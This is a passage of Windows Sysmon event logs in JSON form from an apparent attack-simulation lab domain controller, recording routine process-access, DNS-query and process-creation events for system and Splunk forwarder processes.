05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0244-5F25-0000-001063CD0500}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0244-5F25-0000-001063CD0500}","TargetProcessId":"4124","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3835,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.045\r\nProcessGuid: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nProcessId: 3916\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.045","ProcessGuid":"{A837DB8D-0240-5F25-0000-00107DA50500}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.878\r\nProcessGuid: {A837DB8D-0244-5F25-0000-00102BCF0500}\r\nProcessId: 4132\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.878","ProcessGuid":"{A837DB8D-0244-5F25-0000-00102BCF0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A21B0500}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A21B0500}","TargetProcessId":"4132","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A21B0500}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A21B0500}","TargetProcessId":"4132","TargetImage":"C:\\Program 